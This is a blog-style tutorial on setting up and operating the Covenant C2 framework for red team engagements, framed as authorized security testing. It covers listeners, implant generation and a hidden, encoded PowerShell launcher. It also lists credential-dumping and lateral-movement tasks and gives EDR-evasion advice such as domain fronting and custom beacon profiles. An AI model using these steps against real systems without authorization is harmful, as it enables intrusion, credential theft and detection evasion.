Ethical Hacking #covenant#C2#red team

Covenant C2 Framework: Red Team Operations Guide

Set up and use Covenant C2 for red team operations — deploy listeners, generate grunts, run tasks, and manage implants effectively.

7 min read

Covenant is a .NET-based command and control (C2) framework designed for red team operations. It features a web-based interface, collaborative multi-user support, custom implant generation (called “Grunts”), and a task library built on PowerShell and .NET. It’s a solid alternative to Cobalt Strike for those on a budget or who prefer open-source tooling.

Prerequisites and Installation

Covenant requires .NET 5+ and runs on Linux, macOS, and Windows.

# Install .NET SDK
wget https://packages.microsoft.com/config/ubuntu/22.04/packages-microsoft-prod.deb
sudo dpkg -i packages-microsoft-prod.deb
sudo apt update && sudo apt install -y dotnet-sdk-7.0

# Clone Covenant
git clone --recurse-submodules https://github.com/cobbr/Covenant
cd Covenant/Covenant

# Run
dotnet run

On first launch, Covenant generates a self-signed TLS certificate and starts on https://127.0.0.1:7443. Navigate there and create an admin account.

Architecture Overview

Covenant uses a server-client model:

  • Covenant server: the C2 core, runs the web UI
  • Elite (deprecated): old CLI client — use the web UI directly
  • Listeners: infrastructure that Grunts connect back to
  • Grunts: implants running on target machines
  • Tasks: commands and modules executed on Grunts

Creating a Listener

Listeners define how implants communicate back to your C2.

  1. Navigate to ListenersCreate Listener
  2. Choose listener type: HTTP, HTTPS, or SMB (for lateral movement)
  3. For HTTP listener:
    • Name: anything descriptive
    • BindAddress: 0.0.0.0
    • BindPort: 80 or 443
    • ConnectAddresses: your public/reachable IP
    • ProfileHttpUrls: paths the Grunt will beacon to (e.g., /en-us/docs, /static/css/main.css)

For HTTPS, upload or generate a certificate:

# Generate self-signed cert
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

Generating Grunts (Implants)

  1. Go to Launchers → choose a launcher type

  2. Common types:

    • PowerShell: most compatible, easily detected
    • MSBuild: LOL binary, blends in with development tools
    • Binary: compiled .NET executable
    • Wmic: uses WMIC for execution
  3. Select your listener, configure options:

    • ValidateCert: disable for self-signed certs in testing
    • SleepTime: beacon interval (seconds)
    • JitterPercent: randomize sleep time to avoid pattern detection
    • KillDate: implant auto-terminates after this date
  4. Generate and download the launcher code/binary

Executing Grunts on Targets

PowerShell cradle

# Generated PowerShell launcher (example)
powershell -sta -nop -w hidden -enc BASE64ENCODEDPAYLOAD

Via MSBuild (LOLBin)

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe payload.xml

Once a Grunt connects, it appears in Grunts with status Active.

Running Tasks on Grunts

Click an active Grunt to open the task interface. The task library includes:

Recon tasks

TaskDescription
WhoAmICurrent user and privileges
GetDomainUserEnumerate domain users
GetDomainGroupEnumerate domain groups
GetNetLocalGroupLocal groups on current host
PortScanInternal port scanning
PsProcess list

Credential tasks

TaskDescription
MimikatzRun Mimikatz for credential dumping
LogonPasswordssekurlsa::logonpasswords
DCSyncDomain Controller sync for NTDS hashes
KerberoastKerberoasting attack
GetDomainSPNTicketRequest specific SPN ticket

Lateral movement

TaskDescription
WMIExecute via WMI on remote host
DCOMDCOM lateral movement
SMBGruntDeploy SMB listener Grunt to target

Custom Tasks (Covenant Tasks API)

Covenant tasks are C# classes. Create custom tasks by adding files to Covenant/Data/Tasks/:

using System;
using Covenant.Models.Launchers;
using Covenant.Models.Grunts;

public static class CustomTask {
    public static string Execute(string argument) {
        // Your code here
        return System.IO.File.ReadAllText(argument);
    }
}

Operational Security Considerations

Covenant’s default profiles are well-known to EDR solutions. For real engagements:

  • Modify malleable C2 profiles (HTTP headers, URI patterns, User-Agent)
  • Change default beacon paths away from obvious patterns
  • Use domain fronting or redirectors in front of Covenant
  • Set appropriate sleep/jitter values (e.g., 60s sleep, 30% jitter)
  • Use HTTPS with a valid certificate (Let’s Encrypt)

Lab Setup Recommendation

For safe practice:

  1. Covenant C2 server on a Kali VM
  2. Windows 10 victim VM on an isolated network
  3. Disable Windows Defender in the victim VM for initial learning
  4. Gradually re-enable defenses to practice evasion

Covenant is suitable for authorized red team engagements and internal security testing. Never deploy C2 infrastructure against systems you don’t own or have explicit written permission to test.

#penetration testing #red team #C2 #covenant